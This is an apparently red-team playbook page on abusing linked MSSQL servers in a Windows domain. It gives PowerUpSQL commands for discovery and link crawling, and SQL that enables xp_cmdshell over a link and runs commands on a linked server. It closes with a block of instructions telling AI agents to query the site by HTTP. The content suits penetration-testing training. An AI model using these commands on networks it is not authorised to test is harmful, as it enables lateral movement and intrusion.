# Trust Abuse - MSSQL Servers MS SQL servers are generally deployed in plenty in a Windows domain. SQL Servers provide very good options for lateral movement as domain users can be mapped to database roles. For MSSQL and PowerShell hackery, lets use PowerUpSQL Discovery (SPN Scanning) ``` Get-SQLInstanceDomain ``` Check Accessibility ``` Get-SQLConnectionTestThreaded Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose ``` Gather Information ``` Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose ``` ## Database Links * A database link allows a SQL Server to access external data sources like other SQL Servers and OLE DB data sources. * In case of database links between SQL servers, that is, linked SQL servers it is possible to execute stored procedures. * Database links work even across forest trusts. Searching for Database Links: ``` # Look for links to remote servers Get-SQLServerLink -Instance dcorp-mssql -Verbose ``` Enumerating Database Links Manually * Openquery() function can be used to run queries on a linked database ``` select * from openquery("dcorp-sql1",'select * from master..sysservers') ``` Enumerating Database Links ``` Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose ``` ## Executing Commands * On the target server, either xp\_cmdshell should be already enabled; or * If rpcout is enabled (disabled by default), xp\_cmdshell can be enabled using: ``` EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql" ``` * Use the -QuertyTarget parameter to run Query on a specific instance (without -QueryTarget the command tries to use xp\_cmdshell on every link of the chain) {% code overflow="wrap" %} ``` Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/across-trusts/trust-abuse-mssql-servers.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.